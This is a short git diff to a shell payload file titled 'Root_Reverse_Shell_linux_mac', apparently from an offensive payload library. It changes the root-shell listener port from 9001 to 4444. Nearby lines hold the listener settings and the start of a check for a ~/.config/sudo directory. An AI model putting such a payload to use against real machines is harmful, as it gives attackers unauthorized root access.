diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 314a0bf9..7b7cd436 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -2,7 +2,7 @@ LISTENER_IP="127.0.0.1" LISTENER1_PORT="1337" #Listener for user shell -LISTENER2_PORT="9001" #Listener for root shell +LISTENER2_PORT="4444" #Listener for root shell if [ ! -d ~/.config/sudo ] then